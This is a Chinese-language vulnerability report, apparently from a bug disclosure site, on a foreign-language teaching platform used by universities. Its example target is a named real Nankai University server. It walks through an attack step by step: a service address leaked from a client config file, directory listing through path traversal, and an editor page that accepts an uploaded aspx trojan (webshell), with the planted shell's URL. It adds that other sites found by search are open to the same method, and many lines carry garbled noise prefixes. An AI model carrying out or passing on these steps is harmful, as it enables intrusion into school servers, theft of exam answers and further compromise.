新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中

详细说明：

以南开大学的为例:
+ |8 o# R# j. o* jhttp://222.30.60.3/NPELS
% k6 w1 |3 \5 F. H. i8 `NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
2 t0 \8 h/ I$ x! @* [( n<setting name="Update_CommonSvr_CommonService" serializeAs="String">
0 I9 U. b, ^! y; w1 ?5 Y" ~* p1 N<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
</setting>
: X2 C; X- e/ A  Q及版本号
<add key="TVersion" value="1, 0, 0, 2187">
</add>
直接访问
+ ]/ h  U  n. A  c( e, @5 fhttp://222.30.60.3/NPELS/CommonService.asmx
使用GetTestClientFileList操作，直接 HTTP GET 列目录：
0 I( }" k# K( B! N/ p& b6 o& H7 shttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
进一步列目录（返回的网页很大，可以直接 wget 下来）
; ~9 g! j% S1 {6 P* R1 l% `% Qhttp://222.30.60.3/NPELS/CommonS ... List?version=../../

) x' K8 x; [5 Y/ t9 u$ x; e: A4 g发现
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
% R2 D# |  i2 \8 Y' T/ j3 p9 ?可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
' y! K' d8 A2 W$ D9 a上传后继续列目录找到木马地址直接访问即可
/ l" e  x- E$ {9 }6 J3 E  p; G; `
/ N: l% @1 Z) }- U; NOOXX
, W2 V0 D+ X/ o) S8 `' a
8 F2 I/ |# E, q/ D3 N3 tGoogle "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
漏洞证明：
: a% I( ^) \; H; L  ?
列目录：
+ e' w9 b1 M) \: T3 g9 K$ ]+ K% Ehttp://222.30.60.3/NPELS/CommonS ... List?version=../../
文件上传：
: m" g5 _4 L' Y! \5 h6 o! P* Xhttp://222.30.60.3/npelsv/editor/editor.htm
& t/ B* t0 V: x5 N. c4 r1 M  r
% ?, V6 B) Y. y5 W6 ?" D* J5 h上传木马：
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx

) Z9 R% j" g6 |修复方案：
好像考试系统必须使用 CommonService.asmx
' P& o( ~- G7 H0 {  r) y最好配置文件加密或者用别的方式不让它泄露出来
, [' Y# p9 B1 G并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​